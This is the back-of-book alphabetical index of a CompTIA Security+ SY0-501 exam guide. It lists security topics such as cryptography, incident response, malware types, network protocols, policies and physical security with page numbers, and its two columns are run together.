Plaintext..............................................................116 Implicit deny..............................................................215
ROT13................................................................117 Incident response. 19, 20, 278, 279, 493, 494, 495, 496,
Session keys........................................................131 497, 498, 499, 500
Steganography....................................................118 Containment........................................................498
Storage................................................................298 Eradication..........................................................499
Symmetric...................................................120, 125 Evaluation.............................................................20
Symmetric algorithms.........................................128 Events vs. incidents..............................................19
TPM (Trusted platform module).........................299 Followup.............................................................500
Transport.............................................................120 Forensics.....................................................493, 494
Types...................................................................120 Identification.......................................................497
Weaknesses.........................................................122 Investigation.......................................................498
Wireless..............................................................244 Preparation..........................................................496
XOR functions....................................................122 Process................................................................496
(Full drive Encryption).......................................299 Remediation........................................................279
False positives and negatives.......................................20 Reports................................................................278
Fault tolerance....................................230, 231, 482, 484 Restoring service................................................499
Backup power.....................................................482 Teams..................................................................495
Clustering............................................................482 Industrial control systems..........................................179
Load balancing....................................230, 231, 482 Integrity............................................................9, 15, 135
RAID...................................................................484 Controls.................................................................15
Firewalls.....................................218, 219, 220, 223, 230 Hashing...............................................................135
DMZ...................................................................220 IP address...................................................................186

520 CompTIA Security+ Exam SY0-501


Alphabetical Index

Link-local............................................................186 Virtual.........................................................357, 359


Loopback............................................................186 VPN concentrator...............................................249
Multicast.............................................................186 Web security gateway.........................................230
IP addresses................182, 183, 184, 185, 186, 187, 188 Wireless access points........................................174
Resolution...................................................187, 188 Network convergence................................................179
IPv4....................................................................182, 184 Industrial control systems...................................179
IPv6....................................................................184, 185 Network devices.................................................170, 262
Least privilege..............................................................14 Hardening...........................................................262
Malware.............................63, 65, 66, 67, 315, 316, 317 Routers................................................................170
Adware..................................................................65 Network models.........................................................179
Armored................................................................66 Network ports.............................................192, 197, 198
Defenses................................................................67 Address translation.............................................192
Polymorphic..........................................................66 Common assignments.........................................198
Ransomware.........................................................65 Ranges.................................................................197
Removal..............................................315, 316, 317 Network segmentation...............................................260
Rootkit..................................................................66 Network shares...........................................................297
Spyware................................................................65 File permissions..................................................297
Vectors..................................................................63 Networks....35, 72, 74, 75, 79, 81, 83, 87, 91, 162, 163,
Viruses vs. trojans.................................................63 164, 166, 167, 168, 170, 172, 173, 174, 176, 177, 178,
Mobile devices. 324, 325, 326, 327, 328, 329, 330, 331, 180, 182, 194, 197, 198, 200, 201, 202, 214, 216, 218,
332 219, 220, 222, 223, 227, 228, 229, 230, 233, 236, 237,
Application security............................................330 238, 239, 240, 244, 245, 248, 249, 250, 251, 252, 253,
Authentication.............................................327, 328 254, 259, 260, 261, 262, 264, 267, 272, 274, 276, 277,
BYOD.................................................................325 278, 279, 322, 331, 361, 362, 363, 364, 382, 385, 387,
Data protection....................................................329 392, 393, 395, 396, 468
Encryption...........................................................329 ACL (Access control list)...........................214, 216
Geotagging..........................................................330 Application layer................................................200
Hardening...........................................................332 Assessments........................................................277
MDM..................................................................327 Attack types..........................................................72
Networks.............................................................331 Attacks..................................................................87
Policies................................................325, 326, 327 Auditing..............................................................278
Risks...................................................................324 Authentication.............................385, 387, 395, 396
Screen locks................................................327, 328 Broadcast domain...............................................167
Tracking..............................................................329 Cloud services.............................361, 362, 363, 364
Updating.............................................................332 Collision domain.................................................167
Monitoring. 206, 267, 268, 269, 270, 271, 272, 274, 278 Content filters.....................................................230
Logging.......................................................271, 272 Convergence.......................................................177
Netstat.................................................................206 Cryptography......................................................236
Security audits....................................................278 Data Link layer...................................................166
SNMP.........................................................269, 270 Denial-of-service attacks................................79, 81
Tools...........................................267, 268, 272, 274 Domain.......................................................392, 393
Network components 167, 174, 176, 180, 218, 219, 220, Eavesdropping attacks..........................................87
223, 227, 228, 229, 230, 231, 232, 233, 239, 249, 357, Email...................................................................202
358, 359, 382 Email security.....................................................240
Antennas.............................................................176 Firewalls.............................................218, 219, 220
Authentication server..........................................382 Forced access attacks............................................83
Content filter.......................................................230 Hardening...................................................262, 264
Firewall.......................................218, 219, 220, 223 Honeypots...........................................................229
Honeypot.............................................................229 ICMP...................................................................173
IDS/IPS.......................................................227, 228 IDS/IPS.......................................................227, 228
Load balancer..............................................230, 231 IP addresses.........................................................182
Proxy server........................................................232 IP packets............................................................172
SDN....................................................................358 Layers.........................................................163, 164
Spam filter..........................................................230 MAC addresses...................................................166
SSL Decryptor....................................................239 Management interfaces.......................................223
SSL/TSL Acclerator............................................239 Mobile connections.............................................331
Storage................................................................180 Monitoring..................................................267, 274
Switches..............................................................167 Network Access Control.....................................222
UTM (Unified threat management)....................233 Network layer.....................................................170

CompTIA Security+ Exam SY0-501 521


Alphabetical Index

OSI model...................................................163, 236 Physical security 58, 312, 314, 461, 462, 463, 464, 465,
Ports............................................................197, 198 466, 467, 468, 469, 470, 471, 472
PPP......................................................................382 Access lists..........................................................467
Probe attacks.........................................................72 Alarms.................................................................465
Protected Distribution Systems...........................468 Barricades...........................................................463
Redirection attacks................................................75 Biometrics...........................................................467
Reference models................................................162 Cameras..............................................................464
Remote access.............................................200, 239 Controls...............................................................461
Resource sharing protocols.................................201 EMI shielding.....................................................470
SAN....................................................................180 Environmental controls.......................................468
Securing data......................................................261 Facilities..............................................................462
Security posture..................................................276 Fences.................................................................463
Segmentation..............................................259, 260 Fire suppression..................................................471
Session Layer......................................................197 Guards.........................................................465, 467
SIEM...................................................................272 Hardware locks...................................................468
Spoofing attacks....................................................74 Hosts...................................................................314
SSL and TLS.......................................237, 238, 239 HVAC.................................................................469
Static device security..........................................322 ID Badges...........................................................467
Switches..............................................................167 Lighting...............................................................464
TCP.....................................................................194 Locks...................................................................466
TCP/IP model.....................................................164 Mantraps.............................................................467
Transport layer....................................................194 Motion detectors.................................................465
Transport Layer...................................................194 Peripherals..........................................................312
Troubleshooting..................................................279 Protected Distribution Systems...........................468
UTM (Unified threat management)....................233 Proximity scanners..............................................467
VLANs................................................................168 Safety..................................................................472
VoIP............................................................178, 240 Signs...................................................................464
VPNs (Virtual private networks)......248, 249, 250, Social engineering................................................58
251, 252, 253, 254 PKI (Public key infrastructure)..................................144
Vulnerability assessments.....................................35 Policies.14, 59, 148, 276, 278, 279, 288, 289, 290, 291,
Wireless......................................................174, 176 292, 305, 308, 318, 319, 320, 325, 326, 327, 351, 427,
Wireless attacks....................................................91 428, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449,
Wireless security.........................................244, 245 450, 451, 454, 457, 458, 459, 472, 493, 494, 495, 496,
Zero-day vulnerabilities........................................72 497, 498, 499, 500
Networks (Industrial control systems).......................179 Acceptable use....................................................444
SCADA...............................................................179 Acceptable Use...........................................446, 454
Networks Port security...............................................217 Adverse actions...................................................454
Switches..............................................................217 Asset management..............................................449
Non-repudiation.........................................................137 Audits..................................................................278
Operating systems..............................................310, 311 Business agreements...........................................451
Hardening............................................................311 Certificate Practice Statement.............................148
Trusted................................................................310 Change management...................318, 319, 320, 450
Organizations...............................................................10 Clean desk...........................................................448
Standards bodies...................................................10 Data classification...............................................288
Passwords.....................................84, 136, 373, 376, 447 Data disposal.......................................................305
Cracking................................................................84 Data handling......................................................458
Key stretching.....................................................136 Data life cycle.....................................................291
One-time.....................................................373, 376 Data loss prevention...........................................292
Policies................................................................447 Data ownership...................................................290
Storage................................................................136 Document design................................................445
Penetration tests.........................................36, 39, 40, 41 Documentation....................................................440
Black vs. White box..............................................40 Frameworks........................................................442
Goals and results...................................................39 Human resource..................................................448
Process..................................................................40 Incident response......445, 493, 494, 495, 496, 497,
Reconnaissance.....................................................41 498, 499, 500
Tools.....................................................................40 Least privilege..............................................14, 448
Personally identifiable information (PII).............26, 289 Mandatory vacations...........................................448
Personnel....................................................................495 Mobile devices....................................325, 326, 327
Incident response................................................495 Need to know........................................................14

522 CompTIA Security+ Exam SY0-501


Alphabetical Index

Password.............................................427, 428, 447 SCP.....................................................................239


PII.......................................................................289 SFTP...................................................................239
Privacy........................................................446, 454 SIP.......................................................................240
Regulatory compliance.......................................441 SMB....................................................................201
Remediation........................................................279 SMTP..................................................................202
Rotation of duties................................................448 SNMP.........................................200, 238, 269, 270
Safety..................................................................472 SSH.....................................................200, 239, 251
Secure configuration guides...............................443 SSL.....................................................................237
Security baseline.................................................351 SSL/TLS.............................................................251
Security baselines...............................................308 SYSLOG.............................................................271
Security posture..................................................276 TACACS+...........................................................387
Separation of duties......................................14, 448 TCP.............................................................194, 195
Social engineering................................................59 Telnet..................................................................200
Social media........................................................454 TFTP...................................................................201
Training...............................................457, 458, 459 TLS.....................................................................237
User.....................................................................457 UDP....................................................................196
Port numbers..............................................................194 Regulatory compliance................................16, 364, 441
Private........................................................................184 Cloud services.....................................................364
Procedures..................................................................496 Compensating controls.........................................16
Incident response................................................496 Risk........10, 22, 23, 24, 25, 26, 27, 28, 29, 31, 453, 477
Protocols. .150, 172, 173, 184, 187, 188, 189, 194, 195, Assessment...........................................................22
196, 200, 201, 202, 207, 208, 209, 237, 238, 239, 240, Assets....................................................................23
251, 252, 253, 254, 269, 270, 271, 382, 384, 385, 387, Attacks..................................................................10
392, 393, 395, 396 BCP.....................................................................477
ARP.............................................................187, 207 Impact...................................................................25
DHCP..................................................................189 Management strategies.........................................31
Diameter.............................................................387 Mitigation strategies.............................................31
DNS....................................................................188 Privacy..................................................................26
EAP.....................................................................387 Qualitative vs. quantitative.............................28, 29
FTP.....................................................................201 Registers...............................................................23
FTPS...................................................................238 Supply chain.........................................................26
GRE....................................................................251 Third-party agreements.......................................453
HTTP..................................................................202 Threat probability.................................................27
HTTPS........................................................202, 238 Threat vectors.......................................................10
ICMP...................................................................173 Threats..................................................................24
IMAP..................................................................202 Vulnerabilities.......................................................10
IPsec............................................251, 252, 253, 254 Routers...............................................170, 190, 191, 192
IPv4.....................................................................172 NAT.....................................................190, 191, 192
IPv6.............................................................172, 184 Safety.........................................468, 469, 470, 471, 472
Kerberos......................................................392, 393 Environmental controls...............................468, 470
L2TP...................................................................251 Fire suppression..................................................471
LDAP..........................................................201, 395 HVAC.................................................................469
MAPI..................................................................202 Procedures...........................................................472
NDP....................................................................187 Scope..........................................................................186
NETBios.............................................................201 Security......................................................296, 297, 304
NTP.....................................................................201 Data disposal.......................................................304
OAuth.................................................................396 Encrypting File System (EFS)............................296
OCSP..................................................................150 Local share..........................................................297
OpenID...............................................................396 Share permissions...............................................297
OpenPGP............................................................240 System files.........................................................296
Ping.............................................................208, 209 Security concepts 8, 9, 10, 12, 17, 18, 32, 360, 370, 371,
POP.....................................................................202 372, 373, 377, 378, 379, 382
PPP..............................................................382, 384 AAA............................................................370, 382
PPTP...................................................................251 Alice and Bob.......................................................12
RADIUS.............................................................385 Assets......................................................................8
RDP.....................................................................200 Authentication.............370, 371, 372, 373, 377, 378
RTP.....................................................................240 Automation...........................................................32
S/MIME..............................................................240 CIA triad.................................................................9
SAML.................................................................395 Defense in depth...................................................17

CompTIA Security+ Exam SY0-501 523


Alphabetical Index

Non-persistence..................................................360 Command-line....................................................203
Open security........................................................18 Monitoring..........267, 268, 269, 270, 271, 272, 274
Risk.......................................................................10 Network analyzers..............................................268
Security by design.................................................18 SIEM...................................................................272
Security through obscurity....................................18 Vulnerability scanners........................................277
Standards organizations........................................10 Training..............................................448, 457, 458, 459
Threats..............................................................8, 10 Continuing..........................................................459
Transitive Trust...................................................379 Data handling......................................................458
Vulnerabilities.......................................................10 Policies................................................................448
Security events.............................................................19 Role-based..........................................................457
Security posture.........................................................276 Troubleshooting.........203, 208, 209, 279, 315, 316, 317
Network..............................................................276 Malware..............................................315, 316, 317
Security principles.....................338, 340, 341, 343, 404 Network..............................................203, 208, 209
Access control.....................................................404 Network security.................................................279
Implicit deny.......................................................404 User accounts...417, 418, 419, 420, 421, 424, 426, 427,
Secure coding..............................338, 340, 341, 343 428, 432, 433
Settings.......................................................204, 205, 254 Active Directory.........................418, 419, 420, 421
IP.................................................................204, 205 Group Policies............424, 426, 427, 428, 432, 433
IPsec....................................................................254 Types...................................................................417
Smart cards.................................................................299 User awareness.......................................................58, 67
Encryption...........................................................299 Malware................................................................67
Social engineering..........................52, 53, 54, 56, 57, 58 Social engineering................................................58
Defense techniques...............................................58 Virtualization....248, 249, 251, 252, 253, 254, 354, 356,
Dumpster diving...................................................58 357, 358, 359, 360, 361, 362, 363, 364
Hoaxes..................................................................57 Applications........................................................356
Impersonation attacks...........................................54 Cloud services.............................361, 362, 363, 364
Phishing................................................................54 Container.............................................................354
Principles of operation..........................................53 Hypervisor..........................................................354
Shoulder surfing....................................................58 Network devices.................................357, 358, 359
Spam.....................................................................57 VDI.............................................................358, 360
Spear phishing......................................................56 VM (Virtual Machine)........................................354
Tailgating..............................................................58 VPN............................248, 249, 251, 252, 253, 254
Typosquatting.......................................................56 VPN............................248, 249, 250, 251, 252, 253, 254
URL hijacking.......................................................56 Always-on...........................................................251
Vishing..................................................................56 Components........................................................249
Whaling.................................................................56 Concentrator.......................................................249
Software.............................................................292, 313 IPsec....................................................252, 253, 254
Data loss prevention (DLP)................................292 Protocols.............................................................251
Security...............................................................313 Topology.............................................................248
Special........................................................................184 Tunnel types........................................................250
Standards..............................................10, 144, 146, 148 Vulnerabilities......................................................94, 108
GPG....................................................................146 Add-ons...............................................................108
OpenPGP....................................................144, 146 Applications........................................................108
Organizations........................................................10 Browser...............................................................108
X.509..................................................144, 146, 148 Cookies...............................................................108
Steganography............................................................118 Web applications...................................................94
Storage.......................................................................304 Vulnerability scans.................................................36, 37
Secure destruction...............................................304 Goals and results...................................................37
System files..................................................................75 Types.....................................................................37
Hosts.....................................................................75 Windows features.......................................299, 300, 301
Threats....................................................8, 24, 25, 26, 27 Encryption...........................................299, 300, 301
Assessments..........................................................24 Wireless networks................................................91, 264
Impact...................................................................25 Attacks..................................................................91
Probability.............................................................27 Hardening...........................................................264
Supply Chain........................................................26 XOR functions...........................................................122
Tools...........203, 267, 268, 269, 270, 271, 272, 274, 277

524 CompTIA Security+ Exam SY0-501

Вам также может понравиться